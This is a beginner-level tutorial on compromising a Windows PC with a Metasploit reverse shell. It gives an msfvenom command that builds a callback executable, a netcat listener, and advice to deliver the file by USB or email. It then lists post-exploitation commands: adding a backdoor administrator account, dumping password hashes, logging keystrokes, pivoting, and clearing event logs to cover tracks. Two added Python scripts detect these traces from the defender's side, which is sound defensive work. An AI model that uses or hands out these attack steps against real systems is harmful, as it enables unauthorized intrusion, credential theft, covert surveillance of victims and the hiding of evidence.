
How to Hack a PC with the Reverse Shell Technique (Metasploit)

What is Metasploit Framework?

The Metasploit Framework is an open-source penetration testing platform that allows security professionals and ethical hackers to find, exploit, and validate vulnerabilities in systems. It provides the tools needed to discover weaknesses, gain access to systems, and create reports that help in improving security measures.

Key Features:

  • Exploit Modules: Pre-built scripts for exploiting known vulnerabilities.
  • Payloads: Code that runs after an exploit successfully compromises a system, like creating a reverse shell or uploading malware.
  • Auxiliary Modules: Tools for scanning, sniffing, and other actions that don’t exploit a vulnerability.
  • Post-Exploitation: Actions taken after a system has been compromised, such as privilege escalation, network pivoting, and data extraction.
  • Encoders: Tools to evade security mechanisms, like anti-virus programs.

Example: Exploiting a Vulnerability in Windows SMB

Let’s take the famous EternalBlue (MS17-010) exploit as an example, which targets a vulnerability in the Windows SMB service.

Steps:

Installation Process

On Linux (Kali Linux is preferred):

  1. Update your system:
   sudo apt-get update && sudo apt-get upgrade
  2. Install Metasploit using the package manager:
   sudo apt-get install metasploit-framework
  3. Verify the installation:
   msfconsole

This command should start the Metasploit console.

On Windows:

  1. Download the Metasploit installer:
  2. Run the installer:
  • Double-click the installer and follow the on-screen instructions.
  3. Start Metasploit:
  • Open the command prompt or search for “Metasploit” in your start menu.
  4. Run the msfconsole:
   msfconsole

On macOS:

  1. Install Homebrew if you haven’t already:
   /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
  2. Install Metasploit:
   brew install metasploit
  3. Start Metasploit:
   msfconsole

Here’s a step-by-step guide to performing a reverse shell on a Windows machine, explained in the simplest way possible.

What You Need

  1. Your Computer (Attacker’s Machine): A computer with Linux (like Kali Linux) installed.
  2. Target Computer (Victim’s Machine): A Windows computer that you have permission to test on.
  3. Basic Knowledge: Know how to open a terminal and type commands.

What is a Reverse Shell?

A reverse shell is when the target computer (Windows) connects back to your computer (Linux), allowing you to control the target computer remotely.

Step 1: Set Up a Listener on Your Computer

  1. Open Terminal:
  • On your Linux computer, find and open the terminal. This is where you’ll type commands.
  2. Start a Listener:
  • Type the following command to start a listener that waits for a connection from the Windows computer:
   nc -lvnp 4444
  • What This Does:
    • nc is a tool called Netcat.
    • -l means “listen” for connections.
    • -v makes it show more information (verbose).
    • -n tells it not to try to look up names for IP addresses.
    • -p 4444 means listen on port 4444 (a specific communication channel).
    Now, your computer is waiting for the Windows computer to connect.

Step 2: Create a Payload (the Program That Will Run on the Windows Computer)

  1. Use Metasploit:
  • Open another terminal window on your Linux computer and type:
   msfconsole
  • This opens Metasploit, a tool used to create and manage attacks.
  2. Create the Payload:
  • Type the following command to create a small program (payload) that will run on the Windows computer. Note that msfvenom is a separate command-line tool that ships with Metasploit, so run it from the Linux shell rather than from the msf > prompt:
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=4444 -f exe -o reverse_shell.exe
  • What This Does:
    • msfvenom is a tool in Metasploit that creates payloads.
    • -p windows/meterpreter/reverse_tcp tells it to make a reverse shell for Windows.
    • LHOST=<Your_IP_Address> should be replaced with your Linux computer’s IP address.
    • LPORT=4444 is the port you’re listening on.
    • -f exe makes it a Windows executable file.
    • -o reverse_shell.exe saves it as reverse_shell.exe.
    Now you have a program called reverse_shell.exe that will make the Windows computer connect back to you.

Step 3: Move the Payload to the Target Computer

  1. Copy the File:
  • Get the reverse_shell.exe file to the Windows computer. This could be done by:
    • Copying it using a USB drive.
    • Sending it through email or any other method.

Important: Only do this on a computer you have permission to test on.

Step 4: Run the Payload on the Target Computer

  1. Run the Program:
  • On the Windows computer, double-click the reverse_shell.exe file.
  • What Happens: The Windows computer will now connect back to your Linux computer, giving you control over it.

Step 5: Control the Target Computer

  1. Check Your Listener:
  • Go back to the terminal where you started the listener (nc -lvnp 4444).
  • What You’ll See: A connection from the Windows computer, and a prompt where you can type commands.
  2. Run Commands:
  • You can now type commands in this terminal, and they will run on the Windows computer.
  • For example, type:
   whoami
  • This will tell you the username of the person logged into the Windows computer.

Step 6: Clean Up

  1. Close the Connection:
  • Type exit in the terminal to close the connection.
  2. Delete the File:
  • On the Windows computer, delete the reverse_shell.exe file to remove traces of the test.
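The six steps above describe what the connection looks like from the attacker's side. On the Windows side, the same connection is visible to anyone who runs netstat -ano and tasklist, which is how a defender (or you, checking your own test box afterwards) would spot it. The following script is an added example, not code from the original post or from the Metasploit project: it parses constructed netstat -ano output, joins it with a constructed PID-to-image map from tasklist, and flags established outbound connections that either use a port commonly chosen for reverse shells (4444 in this tutorial) or belong to a shell/interpreter process talking to an uncommon port. The port and image lists are heuristics chosen for this example, not an authoritative rule set.

```python
"""Added example (not from the original post): hunt for reverse-shell-style outbound
connections in the output of `netstat -ano` and `tasklist` on the Windows side.
The sample lines and the PID-to-image mapping below are constructed, not captured
from a real host; the port and image lists are heuristics chosen for this example."""
import re
from dataclasses import dataclass

# Constructed sample in the shape of `netstat -ano` output on Windows.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.20:49711     192.168.1.10:4444      ESTABLISHED     4120
  TCP    192.168.1.20:49712     142.250.74.46:443      ESTABLISHED     3344
  TCP    192.168.1.20:49713     192.168.1.30:445       ESTABLISHED     4
  TCP    192.168.1.20:49714     203.0.113.7:8080       ESTABLISHED     5210
  TCP    [::]:445               [::]:0                 LISTENING       4
"""

# Constructed PID -> image name mapping, as `tasklist` would report it.
TASKLIST_SAMPLE = {
    4: "System",
    912: "svchost.exe",
    3344: "chrome.exe",
    4120: "reverse_shell.exe",
    5210: "powershell.exe",
}

# Ports that reverse-shell tutorials (this one included) use as defaults. Heuristic only:
# an attacker can pick any port, so the second rule below does not depend on this set.
REVERSE_SHELL_PORTS = {4444, 4443, 1337, 5555, 31337}
# Remote ports a Windows host normally talks to; anything else counts as "uncommon".
EXPECTED_REMOTE_PORTS = {53, 80, 88, 123, 135, 139, 389, 443, 445, 636, 3268, 3389, 5985, 5986}
# Shells and script interpreters: they run scripts legitimately, but rarely hold their own sockets.
SHELL_LIKE_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                     "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# One TCP row: local, foreign, state, pid. UDP rows have no state column and are skipped.
NETSTAT_LINE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


@dataclass
class Finding:
    pid: int
    image: str
    remote_host: str
    remote_port: int
    reason: str


def split_endpoint(endpoint: str) -> tuple[str, int]:
    """Split '1.2.3.4:4444' or '[::1]:445' into (host, port); IPv6 hosts keep their brackets."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def hunt(netstat_text: str, pid_to_image: dict[int, str]) -> list[Finding]:
    """Return one Finding per ESTABLISHED TCP connection that matches a reverse-shell heuristic."""
    findings = []
    for line in netstat_text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue  # header, blank line, or a UDP entry
        remote, state, pid = m.group(2), m.group(3), int(m.group(4))
        if state != "ESTABLISHED":
            continue  # listeners are out of scope for an outbound-beacon hunt
        host, port = split_endpoint(remote)
        image = pid_to_image.get(pid, "<unknown>").lower()
        if port in REVERSE_SHELL_PORTS:
            findings.append(Finding(pid, image, host, port,
                                    "remote port is a common reverse-shell default"))
        elif image in SHELL_LIKE_IMAGES and port not in EXPECTED_REMOTE_PORTS:
            findings.append(Finding(pid, image, host, port,
                                    "shell/interpreter process holds a socket to an uncommon port"))
    return findings


if __name__ == "__main__":
    for f in hunt(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"PID {f.pid} ({f.image}) -> {f.remote_host}:{f.remote_port}: {f.reason}")
```

On the constructed sample the script reports two connections: reverse_shell.exe talking to port 4444, and powershell.exe talking to port 8080. The browser on 443 and the System process on 445 are left alone. The second rule is the more durable one: changing LPORT defeats the port list, but a cmd.exe or powershell.exe holding an outbound socket to a non-standard port stays unusual no matter which port was chosen.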

After you’ve established a reverse shell connection, you can use various commands to interact with the target system. Here are some commonly used commands:

Basic Windows Commands

  1. Check the Current User:
   whoami
  • Displays the name of the current user.
  2. List Files and Directories:
   dir
  • Lists all files and directories in the current directory.
  3. Change Directory:
   cd <directory_name>
  • Changes the current directory to the specified directory.
  4. Get Current Directory Path:
   echo %cd%
  • Displays the current directory path.
  5. Display the IP Configuration:
   ipconfig
  • Shows network configuration details such as IP address, subnet mask, and gateway.
  6. List Running Processes:
   tasklist
  • Lists all currently running processes on the system.
  7. Kill a Process:
   taskkill /PID <process_id> /F
  • Kills a process by its process ID (PID). The /F flag forces the process to terminate.
  8. Create a New User:
   net user <username> <password> /add
  • Adds a new user with the specified username and password.
  9. Add User to the Administrators Group:
   net localgroup administrators <username> /add
  • Adds the specified user to the administrators group.
  10. View the System Information:
   systeminfo
  • Displays detailed information about the system, including OS version, architecture, and more.
  11. Open the Command Prompt:
   cmd.exe
  • Launches a new instance of the command prompt.

Advanced Commands with Meterpreter

If you used a Meterpreter payload, you have access to advanced commands:

  1. Get System Information:
   sysinfo
  • Displays information about the target system.
  2. Search for Files:
   search -f <filename>
  • Searches for files matching the specified name.
  3. Dump Password Hashes:
   hashdump
  • Dumps the password hashes from the target system.
  4. Capture a Screenshot:
   screenshot
  • Captures a screenshot of the target system’s desktop.
  5. Record Keystrokes:
   keyscan_start
  • Starts capturing keystrokes.
   keyscan_dump
  • Dumps the captured keystrokes.
  6. Download a File:
   download <remote_path> <local_path>
  • Downloads a file from the target system to your local machine.
  7. Upload a File:
   upload <local_path> <remote_path>
  • Uploads a file from your local machine to the target system.
  8. Get a Shell:
   shell
  • Drops into a standard shell on the target system.
  9. Pivot to Another Network:
   route add <subnet> <netmask> <gateway>
  • Adds a route to pivot through the target machine to reach other networks.
  10. Clear Event Logs:
   clearev
  • Clears the event logs on the target machine to cover tracks.
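Several of the commands in the two lists above leave distinctive records in the Windows Security log: a shell spawned by an executable that is not a normal launcher (Step 4 and the Meterpreter shell command), net user ... /add, net localgroup administrators ... /add, and clearev, which on Windows produces the "audit log was cleared" event. The following triage script is an added example, not code from the original post or from Metasploit. It uses the documented Security-log event IDs 4688 (process created), 4720 (user account created), 4732 (member added to a security-enabled local group) and 1102 (audit log cleared); the event records themselves are constructed to mirror the real field names and were not captured from a live host, and the allowlist of "expected" shell parents is an assumption for this example.

```python
"""Added example (not from the original post): triage Windows Security-log events for the
traces the commands in this post leave behind (a shell spawned by an unexpected parent,
local account creation, Administrators-group changes, audit log clearing). The records
below are constructed to mirror the real events' field names; none came from a live host."""
import re
from dataclasses import dataclass

# Event IDs as documented for the Windows Security log.
PROCESS_CREATED = 4688           # "A new process has been created" (needs command-line auditing on)
USER_CREATED = 4720              # "A user account was created"
LOCAL_GROUP_MEMBER_ADDED = 4732  # "A member was added to a security-enabled local group"
AUDIT_LOG_CLEARED = 1102         # "The audit log was cleared"

SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumed allowlist: parents that normally launch an interactive shell on a workstation.
EXPECTED_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                          "windowsterminal.exe", "services.exe", "code.exe"}
# Matches `net user <name> <pw> /add` and `net localgroup <group> <name> /add` (also net1.exe).
NET_ACCOUNT_CHANGE = re.compile(r"\bnet1?(?:\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.IGNORECASE)
PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "backup operators"}


@dataclass
class Event:
    event_id: int
    fields: dict


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased (C:\\Windows\\cmd.exe -> cmd.exe)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: list[Event]) -> list[Finding]:
    """Apply the four rules in order and return every match as a Finding."""
    findings = []
    for ev in events:
        f = ev.fields
        if ev.event_id == PROCESS_CREATED:
            image = basename(f.get("NewProcessName", ""))
            parent = basename(f.get("ParentProcessName", ""))
            cmdline = f.get("CommandLine", "")
            if image in SHELL_IMAGES and parent not in EXPECTED_SHELL_PARENTS:
                findings.append(Finding(ev.event_id, "shell-from-unusual-parent",
                                        f"{image} spawned by {parent}"))
            m = NET_ACCOUNT_CHANGE.search(cmdline)
            if m:
                findings.append(Finding(ev.event_id, f"net-{m.group(1).lower()}-add", cmdline))
        elif ev.event_id == USER_CREATED:
            findings.append(Finding(ev.event_id, "local-account-created",
                                    f"{f.get('TargetUserName')} created by {f.get('SubjectUserName')}"))
        elif ev.event_id == LOCAL_GROUP_MEMBER_ADDED:
            if f.get("TargetUserName", "").lower() in PRIVILEGED_GROUPS:
                findings.append(Finding(ev.event_id, "privileged-group-member-added",
                                        f"{f.get('MemberName')} added to {f.get('TargetUserName')}"))
        elif ev.event_id == AUDIT_LOG_CLEARED:
            findings.append(Finding(ev.event_id, "audit-log-cleared",
                                    f"cleared by {f.get('SubjectUserName')}"))
    return findings


# Constructed sample: the sequence the commands in this post would produce on a monitored host.
SAMPLE_EVENTS = [
    Event(4688, {"NewProcessName": r"C:\Windows\System32\cmd.exe",
                 "ParentProcessName": r"C:\Users\alice\Downloads\reverse_shell.exe",
                 "CommandLine": "cmd.exe"}),
    Event(4688, {"NewProcessName": r"C:\Windows\System32\net.exe",
                 "ParentProcessName": r"C:\Windows\System32\cmd.exe",
                 "CommandLine": "net user backdoor P@ssw0rd! /add"}),
    Event(4720, {"TargetUserName": "backdoor", "SubjectUserName": "alice"}),
    Event(4688, {"NewProcessName": r"C:\Windows\System32\net.exe",
                 "ParentProcessName": r"C:\Windows\System32\cmd.exe",
                 "CommandLine": "net localgroup administrators backdoor /add"}),
    Event(4732, {"TargetUserName": "Administrators", "MemberName": "backdoor"}),
    Event(4688, {"NewProcessName": r"C:\Windows\System32\notepad.exe",
                 "ParentProcessName": r"C:\Windows\explorer.exe",
                 "CommandLine": "notepad.exe"}),
    Event(1102, {"SubjectUserName": "backdoor"}),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding.event_id}] {finding.rule}: {finding.detail}")
```

Two points worth noting about the design. Account changes are caught twice on purpose, once from the 4688 command line and once from the 4720/4732 audit event, because command-line auditing is off by default and the audit events survive even when it is. And the 1102 event is the reason clearev does not really "cover tracks": clearing the Security log is itself logged, and on a host that forwards events to a collector the cleared entries have usually already left the machine.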

Exiting the Shell

  • Exit the Shell:
   exit
  • Closes the shell session.
  • Background the Session (Meterpreter):
   background
  • Backgrounds the current Meterpreter session, allowing you to interact with Metasploit.

These commands help you interact with and control the target system once you’ve established a reverse shell connection. Always ensure you’re using these commands in an ethical and legal manner.
